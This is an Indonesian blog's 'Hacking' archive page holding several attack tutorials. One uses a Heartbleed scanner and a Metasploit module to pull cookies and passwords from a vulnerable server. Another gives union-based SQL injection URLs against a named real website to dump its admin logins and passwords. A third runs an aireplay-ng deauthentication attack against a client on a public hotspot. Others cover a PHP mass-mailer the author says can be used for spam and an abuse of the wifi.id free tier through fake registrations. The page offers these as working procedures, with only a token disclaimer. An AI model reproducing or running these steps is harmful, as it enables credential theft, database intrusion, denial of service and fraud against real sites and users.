Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts




peretasan sebuah website adalah salah satu kegemaran para hacker ataupun cracker, tujuannya apa?. banyak hal yang melatar belakangi seorang hacker melakukan peretasan. beberapa diantaranya adalah mendapatkan uang, karna sebuah gengsi, kesenangan pribadi dan atau pekerjaan. peretasan di definisikan sebagai cara atau kegiatan yang di lakukan untuk menyusupi suatu tempat (server) dari kesalahan sistem yang terdapat pada website. cara dan konsep dari peretasan website sangat banyak sekali, tergantung exploit atau bug yang ada pada website tersebut, contohnya yang paling umum dan sering di gunakan adalah Sql Injection, XSS, LFI, RFI, Temper Data. Semua cara tersebut sangat banyak terdapat di web dan blog-blog umum. bug tersebut juga masih ada website-website walaupun sudah lama. tapi kali ini saya tidak akan membahas salah satu dari beberapa teknik peretasan tersebut. beberapa waktu lalu, FBI di kagetkan oleh sebuah exploit yang memanfaatkan bug openSSL server namanya adalah HeartBleed, OpenSSL adalah Sebuah Protocol silahkan lihat definisi OpenSSL. banyak server yang menggunakan protocol Openssl terdapat bug ini, termasuk server Gmail.com . wow, bisa di bayangkan server perusahaan sebesar google, bisa di exploit dengan terdapatnya bug tersebut, tak heran serluruh perusahaan terkenal dan instansi kepemerintahan segera melakukan patch terhadap bug tersebut. tapi tidak semua server telah di patch, bug ini masih baru, dan masih banyak sekali server yang vulnerabel terhadap bug ini.

pada kali ini saya akan memberikan langkah-langkah POC (Proof Of Concept ) dari Exploit HeartBleed menggunakan Metasploit Frame Work, segera saja masuk langkah-langkahnya :


1. Cari website yang mau di periksa , apakah terdapat bug openssl nya.
gunakan file python berikut untuk memeriksanya. download filenya HeartBleed2.PY
2. Buka Terminal ctrl+alt+T ,Lihat IP website korban, ketik ping www.target.com , ternyata ketemu ipnya 127.0.0.1 (localhost)
3.  Masuk ke direktory dimana file heartbleed2.py .
Pada contoh berikut, file heartbleed.py saya simpan di direktory ~/Desktop/Hacking

Ketik cd ~/Desktop/Hacking lalu enter

3. ketik python heartbleed2.py 127.0.0.1
NB : - 127.0.0.1 hanya contoh, saya menyembunyikan link dan ip asli korban.
- warna merah adalah alamat website
- warna lime adalah ip website 






4. Dapat di lihat pada gambar di atas, terdapat kalimat ( WARNING: server returned more data than it should - server is vulnerable! )
kalimat tersebut menandakan bahwa server ternyata vulnerable terhadap bug openssl. setelah tau ternyata server vulnerable, slanjutnya kita buka MSFCONSOLE. 


5. ketik search heartbleed ,tunggu sampai library heartbleed kluar, apabila tidak ada. berarti MetasploitFrameWork anda masih belum uptodate. lebih baik di update dulu ketik msfupdate , tunggu hingga update selesai. dan lakukan mulai langkah 4.
apabila sudah terupdate, library heartbleed akan terlihat. seperti pada gambar di bawah ini. 






6. Pilih auxiliary/scanner/ssl/openssl_heartbleed , ketik use auxiliary/scanner/ssl/openssl_heartblee lalu Enter.

7. setelah itu ketik show options  untuk melihat apa saja value yang perlu di rubah.


8. dapat di lihat pada gambar di atas terdapat beberapa opsi, ada beberapa yang harus di ganti. yaitu RHOSTS dan verbose nya.
ketik set RHOSTS 127.0.0.1 
NB : ganti 127.0.0.1 dengan IP sesuai IP target yang anda dapat .
lalu ketik set verbose true 
9. setelah semua di set, sekarang waktunya eksekusi.

ketik run untuk menjalankan exploitnya.


10. apabila berhasil , anda akan di hadapkan pada code2 seperti cookie, user agent, dan user n password kalau kalian beruntung. inti dari exploit heartbleed adalah kalian akan mendapati pesan-pesan sensitif atau pribadi yang ada dalam server, yang bisa kalian gunakan untuk melakukan tindak hacking selanjutnya.

source : sakeracoder
Mau pasang iklan di blog?. klik Disini

Sekian artikel saya, Semoga Bermanfaat.

Stay fools to Stay Hungry

NB : Artikel ini di peruntukkan untuk pendidikan semata. hal-hal negatif yang di lakukan oleh pengguna tutorial , bukan tanggung jawab penulis.











Relate Search : Melihat isi database dengan teknik manual Sql Injection, Mencuri isi database, Sql Injection, Sqli, Dork Sqli, Cara hacking website dengan sql injection, google dork, dork terbaru.

Sql Injection adalah salah satu teknik hacking suatu website yang memanfaatkan bug Sql pada link dinamis, pada url tersebut attacker dapat memasukkan perintah Sql ke dalam statement Sql via input website. Banyak cara untuk melakukan Sql Injection seperti dengan tools SqlMap, Havij dll, tetapi pada tutorial kali ini saya akan menjelaskan tentang cara Sql Injection secara manual melalui addressbar.

Berikut Langkah-Langkahnya :

1. Siapkan target terlebih dahulu, ( Website yang vulnerable terhadap Sql injection ). Cara mencari nya kita dapat menggunakan Google Dork, untuk melihat google dork terbaru bisa lihat DISINI.
untuk definisi Google Dork dan list Google dork terbaru bisa lihat DISINI.

2. Setelah kita dapat targetnya , sekarang kita akan mulai periksa, apakah website tersebut vulnerable terhadap Sql injection, pada kali ini saya akan mengambil contoh dari website berikut :

http://www.firstgulf.com/search-details.php?id=59




3. Tambahkan Quote pada akhir URL. Contoh :

http://www.firstgulf.com/search-details.php?id=59'



4. Terlihat di atas bahwa terjadi Error Pada Sintax Sql website, hal tersebut menunjukkan website vulnerable terhadap Sql Injection. Setelah itu ganti Quote dengan order by <angka>-- untuk melihat berapa table yang di miliki oleh website.


contoh :
http://www.firstgulf.com/search-details.php?id=59 order by 20--  , kita akan mengetahui jumlah table website apabila dalam permintaan jumlah table tidak terjadi error.

seperti contoh sebelumnya yaitu
http://www.firstgulf.com/search-details.php?id=59 order by 20-- . dalam website target ternyata error, maka lanjutkan ke angka yang lebih bawah.
order by 15-- ( Terjadi Error )
order by 13-- ( Terjadi Error )
order by 11-- ( Tidak Terjadi Error ) #Karna pada angka 11 tidak terjadi Error maka lanjutkan ke angka yang lebih besar selanjutnya yaitu 12.

order by 12-- ( Terjadi Error ) # ternyata pada angka 12 terjadi error, maka bisa di pastikan bahwa website target memiliki jumlah table sebanyak 11.

Contoh Error Order Table :



Hosting Unlimited Indonesia


Contoh Order Table Tanpa Error :





5. Setelah di ketahui bahwa jumlah table ada 11, selanjutnya kita mencari angka akan menunjukkan isi databasenya nanti.tambahkan tanda"-" di awal angka 59, dan deretan angka 1 sampai 11 di akhirnya.

http://www.firstgulf.com/search-details.php?id=-59 union all select
1,2,3,4,5,6,7,8,9,10,11--

6. Dapat di lihat pada gambar di atas, Ketika semua angka di pilih pada perintah Sql = Union All select. pada halaman website target muncul segelintir angka yang posisinya tidak menentu, pada contoh kali ini terlihat angka 2, 3 dan 5. Karna angka 3 yang paling terlihat jelas, jadi kita akan menggunakan angka 3.

7. selanjutnya kita akan melihat versi dari Database Mysql Website target.
ganti angka tiga pada Url sebelumnya, dengan "version()" tanpa tanda kutip.


contoh : http://www.firstgulf.com/search-details.php?id=-59 union all select 1,2,version(),4,5,6,7,8,9,10,11--

ternyata setelah di lakukan perintah di atas, angka tiga berganti dengan versi dari database mysql target. dapat terlihat versi nya adalah 5.5.32 .
sebenernya ada versi 4.x.x , tapi pada versi tersebut cara ini tidaka akan berhasil karna untuk database versi 4.x.x , kita akan di hadapkan pada cara Blind Sql.




8.  Selanjutnya kita akan melihat isi daftar table yang ada pada website target .
tambah kan pada url sebelumya.


http://www.firstgulf.com/search-details.php?id=-59 union all select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--


9. Terlihat sudah daftar nama semua table website target. kita cari nama table yang hampir mirip atau memang tempat penyimpanan user dan password login website. pada contoh di sini, terlihat ada table yang bernama "admin", kita akan pilih itu untuk di lihat kolomnya. sebelum eksekusi ke pembedahan table "admin", kita harus merubah kata "admin" kedalam bentuk hexadesima, untuk melakukannya silahkan kunjungi DISINI.


 Ganti beberapa kata dalam url tadi :

http://www.firstgulf.com/search-details.php?id=-59 union all select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11 from information_schema.columns where table_name=0x61646d696e--

NB : kata database() di ganti dengan nama table "admin" yang sudah di jadikan hexadesimal, ditambah 0x di depannya jadi = 0x61646d696e .

10. Setelah langkah di atas selesai dan berhasil, kita akan melihat isi dari table "admin" yaitu beberapa kolom. berikut nama-nama kolom pada table "admin".

# id
# admin_name
# admin_login
# admin_password



11.  Setelah di dapati  semua nama kolom, sekarang waktunya untuk melihat isi dari kolom tersebut.

ketik :


http://www.firstgulf.com/search-details.php?id=-59 union all select 1,2,group_concat(id, 0x3a,admin_name,0x3a,admin_login,0x3a,admin_password,0x0d0a),4,5,6,7,8,9,10,11 from admin--

NB : 
0x3a adalah bentuk Hexadesimal dari ":" (colon)
0x0d0a adalah bentuk Hexadesimal dari <enter>


12. akhirnya sudah terlihat isi dari kolom "admin" , di situ sudah terpampang
 id:admin_name:admin_login:admin_password

13. Untuk pengembangan selanjutnya anda bisa melakukan login ke halaman admin atau hanya melakukan pentesting terhadap database.
apabila ingin melanjutkan login, silahkan cari halaman login dengan tools, adminfinder.py download DISINI.

berikut ScreenShot nya :




Mau pasang iklan di blog?. klik Disini
Sekian artikel saya, Semoga Bermanfaat.

Stay fools to Stay Hungry
NB : Artikel ini di peruntukkan untuk pendidikan semata. hal-hal negatif yang di lakukan oleh pengguna tutorial , bukan tanggung jawab penulis.



Assalamualaikum Wr Wb .

Email BroadCaster adalah teknik untuk mengirim pesan secara masal ke segala jenis email, teknik ini di gunakan untuk banyak hal, seperti publikasi acara, undangan, pengumuman, bahkan spaming. contoh teknik broadcast adalah broadcast message milik BlackBerryMesangger. Banyak orang memanfaatkan fitur ini sebagai Mempromosikan Penjualan, Produk. dll.

PHP Script memiliki Fitur untuk mengirim email , Bagaimana caranya?. dalam Bahasa pemrograman PHP, terdapat code mail(to, subject, message) , yang akan kita bahas selanjutnya.
Contoh Email Broadcaster sudah saya buat adalah berikut ini : bill.meximas.com

Screenshot direktori  :


pada contoh sebelumnya, apabila kita klik kirim, halaman otomatis akan di muat ke halaman baru, yaitu ke bill.meximas.com/mail/openfile.php , file openfile.php adalah file yang akan membaca file bill.txt pada direktori /mail/upload/bill.txt. isi dari file bill.txt adalah kumpulan email yang akan kita tuju nanti. apabila ingin mengirim ke email yang lain, kita harus menggantinya pada file tersebut.

Berikut tata cara pembuatan Email BroadCaster dengan PHP Script :

1. Buat akun web hosting dahulu, kalo sudah punya langsung masuk ke file manager atau upload via FTP.
NB : di harapkan web hosting nya sama, agar tidak ada kesulitan yang berarti. pada tutorial kali ini saya menggunakan hosting ini .

2. Sebelum ke langkah upload, silahkan anda download terlebih dahulu file berikut EmailBroadCaster.zip, setelah itu extract file nya. atau copy paste dari link berikut :
- openfile.php
- mail.php
- index.php

3. apabila semua file telah siap, waktunya kita upload file tersebut ke server. pada tutorial ini saya akan menggunakan file manager 1 yang ada pada fitur idhostinger .




4. setelah membuka file manager, silahkan buka folder upload,  Ganti isi file bill.txt dengan list email yang hendak di broadcast.



5. Apabila berhasil, akses web anda, lalu klik kirim. seperti pada gambar berikut :


 6. apabila berhasil sesuai langkah2 di atas. hasil pengiriman broadcast email akan seperti berikut.




Mau pasang iklan di blog?. klik Disini
Sekian artikel saya, Semoga Bermanfaat.

Stay fools to Stay Hungry
NB : Artikel ini di peruntukkan untuk pendidikan semata. hal-hal negatif yang di lakukan oleh pengguna tutorial , bukan tanggung jawab penulis.


 Assalamualaikum Wr Wb

Aircrack-ng adalah salah satu tools hacking yang sering di pakai untuk penetration test jaringan wifi, dari nama sudah terlihat , yaitu di awali dengan kata Air ( Udara ). Aircrack-ng tidak berdiri sendiri, tools ini di tunjang dengan beberapa tools pendukung yaitu airodump-ng, airmon-ng, aireplay-ng dll.

Airmon-ngadalah tools yang berfungsi untuk mengganti mode pada device network tertentu contoh : wlan0 , eth0 dll.
- wlan0 adalah device network untuk jaringan wireless.
- eth0 adalah device network untuk jaringan cable/wire.

Airodump-ngadalah tools yang berfungsi untuk memantau paket data yang lalu lalang di udara, dalam jarak jangkauan network device kita.

Aireplay-ngadalah tools yang berfungsi untuk melakukan injecting paket data pada jaringan di area kita.

Pada tutorial kali ini kita akan mempraktekkan penggunaan tools Aircrak-ng pada teknik memutuskan koneksi komputer tertentu dengan cara membanjiri jaringan komputer korban dengan request yang ilegal. Operating System yang saya gunakan adalah OS Kali Linux 1.0.6 . bagi yang belom punya silahkan download disini. > versi windows : versi linux

Berikut langkah-langkahnya :

1. Buka terminal, Ketik : airmon-ng start wlan0


 Berikut hasil apabila di tekan Enter :


 Keterangan :
- terlihat pada gambar di atas, pada interface wlan0 , terdapat keterangan  pada kolom driver bahwa ( mode monitor pada interface wlan0 telah hidup )


2. Setelah mode monitoring hidup, waktunya kita melakukan monitoring pada jaringan yang lalu lalang melintasi device kita.

Ketik : airodump-ng mon0


 keterangan :

- format argument yang ada pada tools airodump-ng adalah >airodump-ng [INTERFACE]
- interface kita menggunakan mon0 karna interface tersebut terbentuk dari proses penghidupan mode monitoring tadi.

Berikut hasil apabila di tekan Enter :             





 keterangan :

- tampilan di atas akan tampil apabila kita menjalankan perintah pada airodump-ng.
- target kita ambil dari frames terbanyak, dan sedang tersambung pada AP @wifi.id .

3. Catat mac address AP (Access Point) dan mac address Client , pada contoh kali ini adalah :

- mac  AP : 50:06:04:7A:87:D0
- mac Client : CC:AF:78:33:5E:88        

     

 4. Setelah itu ketik dan paste kan mac address pada argument tools aireplay-ng :
> aireplay-ng -0123456789 -a 50:06:04:7A:87:D0 -c CC:AF:78:33:5E:88 mon0



             

 keterangan :
- format argument yang ada pada tools aireplay-ng adalah >aireplay-ng [OPTION] [INTERFACE]
- argument -0123456789 berfungsi sebagai berikut :

Attack modes (numbers can still be used):

     --deauth      count : deauthenticate 1 or all stations (-0)
     --fakeauth    delay : fake authentication with AP (-1)
     --interactive       : interactive frame selection (-2)
     --arpreplay        : standard ARP-request replay (-3)
     --chopchop       : decrypt/chopchop WEP packet (-4)
     --fragment        : generates valid keystream   (-5)
     --caffe-latte      : query a client for new IVs  (-6)
     --cfrag             : fragments against a client  (-7)
     --migmode      : attacks WPA migration mode  (-8)
     --test                : tests injection and quality (-9)

5. Setelah di tekan enter, program akan berjalan melancarkan serangan kepada komputer atau laptop korban, dengan cara membanjiri jaringan korban dengan request ilegal.  tunggu hingga 1 menit atau secukupnya.      


     


Mau pasang iklan di blog?. klik Disini
Sekian artikel saya, Semoga Bermanfaat.

Stay fools to Stay Hungry
NB : Artikel ini di peruntukkan untuk pendidikan semata. hal-hal negatif yang di lakukan oleh pengguna tutorial , bukan tanggung jawab penulis.


suka anime? pasti pernah download di situs samehadaku.net iya kan? :D :D , nah situs ini memiliki banyak anime, salah satunya adalah anime kesukaan saya yaitu onepiece. waktu saya mau download anime di situs ini, eh tiba2 ada notif "matikan addblock", saya mikir kq hebat banget ini halaman bisa tau kalo aku make addblock :o . dan akhirnya saya nyoba footprinting terhadap website ini, ternyata website ini adalah blog yang menggunakan script jquery untuk memberikan notifikasi "matikan addblock", segera setelah itu saya coba membuat script untuk menghilangkan notif tersebut, script ini saya kasih nama "anti anti addblock samehadaku.net " :D :D :D hahahaha langsung aja check langkah2nya :

1. buka halaman samehadaku.net yang mau di download animenya
2. apabila keluar notifikasi "hilangkan addblock", klik kanan "inspect element" 



3. buka tab console



4. ketikkan script berikut di console
jQuery(document).ready(function( $ ) { $("b").hide(5000)});
 NB : Text berwarna merah bisa di hilangkan kalau pengen cepet.

5. enter



daaan voilaa. :D

NB: tutorial ini hanya di gunakan untuk pendidikan semata

Relate post : Exploit, Wifi.id , Username , Password, Free, Bug, Hacking, Cracking, Not Patch

Assalamualaikum Wr Wb, tutorial kali ini tentang bug fitur free wifi.id yang terbaru. wifi.id adalah trobosan baru dari telkom indonesia yang mulai melirik ke dalam dunia cyber atau internet yaitu menyediakan layanan internet hotspot berbayar dan gratis yang di namakan WIFI.ID. tanggapan masyarakat tentang adanya wifi.id pun tidak main-main, mereka langsung menyerbu dan beralih pandangan dari penyewaan warnet ke penggunaan wifi.id, pasalnya kecepatan yang di sajikan oleh wifi.id sangat besar yaitu up to 10MBPS atau kalau di dalam kecepatan download stabil 1MB/Second, bisa lebih . dengan adanya wifi.id masyarakat tidak lagi bingung dimana akan mencari tempat yang bisa download cepet, mereka langsung mengasumsikannya ke wifi.id , tapi ada yang perlu di perhatikan dari penggunaan hotspot ini. apabila anda ingin menggunakan jasa ini, anda harus merogoh kocek dulu untuk dapat browsing ataupun download menggunakan wifi.id , tetapi  baru-baru ini terdapat fitur baru yaitu free wifi.id, fitur ini menyediakan jasa internet gratis selama 15 menit tiap harinya kepada semua user yang terdaftar, dan kalau ingin menjadi member anda harus registrasi dulu di website wifi.id.

TETAPIIII. tidak sampai disitu pembahasan saya. ternyata di balik fitur baru yang di suguhkan oleh wifi.id, terdapat bug yang sangat fatal, bugnya adalah TIDAK ADANYA KONFIRMASI EMAIL saat melakukan registrasi, dan user yang telah mengisi form langsung di redirect ke halaman setelah login. jadi setelah anda mengisi form registrasi maka anda bisa browsing ,download, streaming sesukanya tanpa harus melakukan konfirmasi email. beberapa hal yang bisa di lakukan dalam teknik phreaking ini adalah : 

1. anda bisa mengisi form dengan segala macam data palsu
2. anda bisa mengisi form berulang kali tanpa ada batasan waktu
3. anda hanya bisa browsing selama 15 menit tetapi tidak terbatas dalam registrasinya.

bug ini masih bisa sampai artikel ini di posting, untuk tutorialnya silahkan lihat dibawah ini : 

NB: Bug ini sudah di ketahui oleh operator wifi id, tetapi sayangnya folder bug nya masih belum di hapus, apabila anda tidak bisa mengakses free wifi, coba ganti URL pada level kedua yaitu :
welcome9.wifi.id/wifi.id-blablabla
menjadi
welcome9.wifi.id/wifi.id-wag/


1. koneksi ke AP( Access Point ) wifi.id, browsing seperti biasa, nanti anda akan di alihkan ke halaman wifi.id. seperti berikut : 


2. klik gambar FREE WIFI. maka anda akan masuk ke laman login seperti berikut : 


3. karna anda tidak memiliki akun wifi.id, maka klik link untuk  registrasi.


4. maka anda  akan di alihkan ke halaman yang berisi form registrasi. isi form registrasi sesuai identitas anda ATAAUUU isikan dengan DATA PALSU.

NB : ini adalah point dari bug free wifi.id, pada form sesi registrasi tidak ada fitur keamanan yang bertugas untuk melakukan konfirmasi email.


5. centang "saya setuju dengan blablabla" , lalu klik login, maka akan ada warning yang menyebutkan bahwa anda akan browsing selama 15 menit. lalu klik OK. 

VOILLAAA, anda telah melewati proteksi login dari wifi.id, dan anda bisa browsing sesukanya selama 15 menit.

NB: lakukan cara yang sama dari langkah ke 1 sampai terakhir apabila waktu login anda telah habis.


NOTE : 3xpl01t memberikan tawaran bagi pembaca yang ingin order membuat website, bisa order ke kami , untuk tata caranya bisa masuk ke link berikut. 

Mau pasang iklan di blog?. klik Disini

Sekian artikel saya, Semoga Bermanfaat. Wassalamualaikum Wr Wb

Stay fools to Stay Hungry
NB : Artikel ini di peruntukkan untuk pendidikan semata. hal-hal negatif yang di lakukan oleh pengguna tutorial , bukan tanggung jawab penulis.
Previous PostOlder Posts Home